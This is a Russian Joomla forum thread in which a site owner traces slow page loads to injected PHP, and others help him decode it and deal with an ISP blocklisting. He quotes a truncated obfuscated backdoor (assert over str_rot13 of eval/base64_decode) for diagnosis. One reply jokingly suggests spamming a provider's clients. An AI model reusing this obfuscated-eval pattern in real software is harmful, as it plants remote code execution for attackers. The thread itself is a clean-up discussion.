Форум русской поддержки Joomla!® CMS
08.12.2016, 00:20:50 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

При попытке загрузить индексную страницу сайта происходит обращение к стороннему ресурсу. Как решить

 (Прочитано 346 раз)
0 Пользователей и 1 Гость смотрят эту тему.
Mrakobes_87
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 9


« : 01.06.2016, 19:11:48 »

Всем доброго времени суток. Столкнулся с такой проблемой: сайт время от времени очень медленно грузится либо ошибку 502 выдает. Сайт: http://oknoptk.ru/ на Joomla 3. В тех поддержке хостинга говорят, что проблема с длительной загрузкой возникает потому, что при попытке загрузить индексную страницу Вашего сайта происходит обращение к стороннему ресурсу 95.181.179.152.
Сторонний ресурс это некто: Neohost.net

Проверка сайта на внешние ссылки ничего толкового не дала. Плагины и модули установлены из проверенных источников и на других сайтах проблем не возникает.

Уважаемые форумчане, подскажите кто, что думает по этому поводу? Как решить проблему?
Записан
umbabaraumba
Практически профи
*******

Репутация: +153/-1
Offline Offline

Пол: Мужской
Сообщений: 2558

если помог можете поставить +


« Ответ #1 : 02.06.2016, 00:37:21 »

Смотреть логи
Записан
Mrakobes_87
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 9


« Ответ #2 : 02.06.2016, 09:50:15 »

Смотреть логи
Логи тоже ничего путного не дают, нет в них ошибок с указанным IP
Записан
robert
Профи
********

Репутация: +344/-11
Offline Offline

Пол: Мужской
Сообщений: 3586


« Ответ #3 : 02.06.2016, 10:19:24 »

Проверка сайта на внешние ссылки ничего толкового не дала.
А jextensions.com - внутренняя ссылка? Она, наверное, не имеет отношения к вопросу, но дает повод усомниться в компетентности проверки.
Логи тоже ничего путного не дают, нет в них ошибок с указанным IP
Почему это должно быть ошибкой?
« Последнее редактирование: 02.06.2016, 10:34:55 от robert » Записан
Mrakobes_87
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 9


« Ответ #4 : 02.06.2016, 11:10:47 »

А jextensions.com - внутренняя ссылка? Она, наверное, не имеет отношения к вопросу, но дает повод усомниться в компетентности проверки.Почему это должно быть ошибкой?
Я знаю куда ведет ссылка jextensions.com и еще одна, которая обнаружена. Поэтому о ней ни чего не написано выше. Тем более удаление расширений с этой ссылкой ничего не дало. Поиск не обнаружил именно ссылку на ID который грузит сайт.
Я далеко не спец в чистке взломанного сайта. Поэтому прошу реальных возможных решений.
Записан
Mrakobes_87
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 9


« Ответ #5 : 03.06.2016, 18:58:25 »

Проблема решена путем долгого и мучительного поиска Smiley
Может кому пригодится. В некоторые файлы сайта попал вот такой сцуко код:
 ...//###=CACHE START=###
error_reporting(0);
$strings = "as";$strings .= "sert";
@$strings(str_rot13('riny(onfr64_qrpbqr ("nJLtXTymp2I0XPEcLaLcXF... и т.д.

Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3488


skype aqaus.com


« Ответ #6 : 03.06.2016, 19:02:28 »

Ну он не просто так туда попал. Ищите источник заражения.
Записан
pavelrer
Давно я тут
****

Репутация: +4/-0
Offline Offline

Сообщений: 262


« Ответ #7 : 03.06.2016, 19:45:30 »

вот жуки "onfr64_qrpbqr" - это base64

http://base64.ru/  и вставляем что в кавычках.
расшифровываем, и смотрим пути от кудова лезит.

Вероятно будет что-то типа

$module = 'Magmodules_Shippingperkm';
$module_version = 'Magmodule_Shipkm1053';
$module_path = 'shippingperkm/general/';
$module_server = str_replace('www.', '', $_SERVER['HTTP_HOST']);
$module_installed = Mage::getConfig()->getNode()->modules->Magmodules_Shippingperkm->version;
return base64_encode(base64_encode(base64_encode($module . ';' . $module_version . ';' . $module_installed . ';' . trim(Mage::getModel('core/config_data')->load($module_path . 'license_key', 'path')->getValue()). ';' . $module_server . ';' . Mage::getUrl(). ';' . Mage::getSingleton('admin/session')->getUser()->getEmail(). ';' . Mage::getSingleton('admin/session')->getUser()->getName(). ';' . $_SERVER['SERVER_ADDR'])));
Записан
Mrakobes_87
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 9


« Ответ #8 : 03.06.2016, 21:15:08 »

вот жуки "onfr64_qrpbqr" - это base64

http://base64.ru/  и вставляем что в кавычках.
расшифровываем, и смотрим пути от кудова лезит.

Согласно декодеру после расшифровки получается что то типа: ⷫ늫庫
Китайцы мать вашу Sad
Кто нибудь в китайском понимает?...
Записан
Mrakobes_87
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 9


« Ответ #9 : 03.06.2016, 21:21:19 »

Народ, ещё вопрос почти что в тему.
Делал больше года назад сайт один: http://kvadra-group.com/
В один ужасный момент его ломанули и навтыкали ссылок на какой то, опять же китайский интернет магазин. Пока Google не маякнул, я не заметил (так как сайт работал в нормальном режиме). Сайт я почистил, Google санкции снял. Но вот проблема, сайт попал в реестр запрещенных... Только на одних провайдераж он открывается без проблем, а на некоторых (какой то "Атлас телеком" например, как раз оказавшийся у клиента) он сцуко не открывается. Тех поддержка этого атласа снимать блокировку отказывается.
Может кто знает как решить проблему? И еще вопрос, у кого какой провайдер, сайт открывается или нет? Wink
Записан
pavelrer
Давно я тут
****

Репутация: +4/-0
Offline Offline

Сообщений: 262


« Ответ #10 : 03.06.2016, 21:33:24 »

Цитировать
Согласно декодеру после расшифровки получается что то типа: ⷫ늫庫
Неправильно наверное декоднули или не в ту сторону.

Тот код что я написал, это из вашего начала, так что должен получиться код php скрипта.

Цитировать
Тех поддержка этого атласа снимать блокировку отказывается.

Спросить у тех.поддержки, что нужно выполнить для снятия санкций. Хотя они могут базу спам сайтов тянуть из другого места и по ней автоматом работать.

Записан
Mrakobes_87
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 9


« Ответ #11 : 03.06.2016, 21:42:45 »

Неправильно наверное декоднули или не в ту сторону.

Тот код что я написал, это из вашего начала, так что должен получиться код php скрипта.

Декодировал вот этим http://base64.ru/ Х.з.
Спросить у тех.поддержки, что нужно выполнить для снятия санкций. Хотя они могут базу спам сайтов тянуть из другого места и по ней автоматом работать.


Спрашивал. Они не знают, только отмахиваются, мол не наша проблема.
Записан
pavelrer
Давно я тут
****

Репутация: +4/-0
Offline Offline

Сообщений: 262


« Ответ #12 : 03.06.2016, 22:02:22 »

Тут надо понять кто блокирует.
Если провайдер, и решать задачу не хочет совсем.

То нагадить такому провайдеру полный таз от китайского noname, с предупреждением о санкциях.
Разослав всех им клиетам, страшное письмо, а еще лучше если они занимаются хостингом.
Найти всех клиентов и накакать там! Вони будет огого  Grin

Но лучше искать общий язык, а то можно и нагадить не тому Grin
Записан
Mrakobes_87
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 9


« Ответ #13 : 03.06.2016, 22:22:25 »

Тут надо понять кто блокирует.
Если провайдер, и решать задачу не хочет совсем.

То нагадить такому провайдеру полный таз от китайского noname, с предупреждением о санкциях.
Разослав всех им клиетам, страшное письмо, а еще лучше если они занимаются хостингом.
Найти всех клиентов и накакать там! Вони будет огого  Grin

Но лучше искать общий язык, а то можно и нагадить не тому Grin
Провайдер однозначно не хочет решать проблему. Послали и меня, как админа, и клиентов с которыми у них договор заключен. Хостер на котором сайт лежит пошел на встречу, меняют серваки где сайт лежит, ну и IP сайта соответственно. Может поможет. А кто столкнется с провайдером "Атлас телеком", посылайте из в ж...у
Записан
pavelrer
Давно я тут
****

Репутация: +4/-0
Offline Offline

Сообщений: 262


« Ответ #14 : 03.06.2016, 22:34:45 »

Цитировать
Хостер на котором сайт лежит пошел на встречу, меняют серваки где сайт лежит, ну и IP сайта соответственно.

Это конечно решение, но Если провайдер блокирует по IP, т.е если это шарик то провайдер блокирует все хосты из-за одного.
тоды поможет.
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet